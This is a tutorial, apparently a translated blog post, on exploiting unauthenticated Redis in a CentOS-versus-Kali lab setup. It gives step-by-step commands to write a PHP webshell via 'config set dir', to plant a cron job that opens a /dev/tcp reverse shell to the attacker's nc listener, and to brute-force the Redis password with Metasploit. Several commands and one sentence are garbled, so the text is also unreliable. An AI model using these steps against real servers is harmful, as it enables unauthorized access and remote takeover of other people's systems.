.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
Redis is a cross-platform non-relational database. The data in memory can be saved on disk and can be loaded again for use during restart. It supports strings, hash tables, lists, collections, ordered collections, bitmaps, hyperloglogs and other data types.
Vulnerability Principle
When Redis defaults to port 6379 and is a password or a weak password, the redis service on the public network will be accessed by any user unauthorized, read data, and use redis's own commands to write files. Thus gaining system permissions.
Experimental Environment
Centos7 (public network, victim end) Kali Linux (attack end)
Installing Redis
We first install Redis in Centos. Execute the following commands separately
wget http://download.redis.io/releases/redis-2.8.17.tar.gz #Download
tar xzf redis-2.8.17.tar.gz #Decompression
cd redis-2.8.17
make #Compiled
cd src
cp redis-server /usr/bin
cp redis-cli /usr/bin
cd .
cp redis.conf /etc/
redis-server /etc/redis.conf 
It should be noted that we need to open port 6379 in the firewall and security group.
Unauthorized Test
We directly execute the following command in kali
redis-cli -h 8.219.xxx.xxx 
If it is a higher version of redis, you need to modify the configuration file. Remove the # comment before bind and change the protected-mode to no.
Use redis to write webshell
When writing webshells using redis, we need to know the path of the web site. Otherwise, you won't be able to connect even if you generate a webshell. Suppose that when we are in our site directory, execute the following command.
config set dir /var/www/html #Set directory
config set dbfilename kali.php #Generate file
set xxx '\r\n\r\n?php phpinfo();\r\n\r\n' #Write content to the file
save#Save 
After completion, we access the file 
Bounce Shell
We use nc to listen to ports in kali.
nc -lvp 5555 
Next we use redis to create a timed task file. Online nc through timed tasks
config set dir /var/spool/cron/crontabs
config set dbfilename root
set xxx '\n\n* * * * * * /bin/bash -i/dev/tcp/kali's IP/5555 01\n\n'
After saving time, the command will be automatically executed to go online.
redis password cracking
Generally speaking, the default password will be set. We modify it in the configuration file redis.conf.
Configure msf
msfconsole
use auxiliary/scanner/redis/redis_login
set RHOSTS 8.219.xxx.xxx
set PASS_FILE /root/22.txt #Set password dictionary
run 
There are many modules for redis utilization in msf. We can use the following command to view
search redis 
After simple configuration, it can be used directly.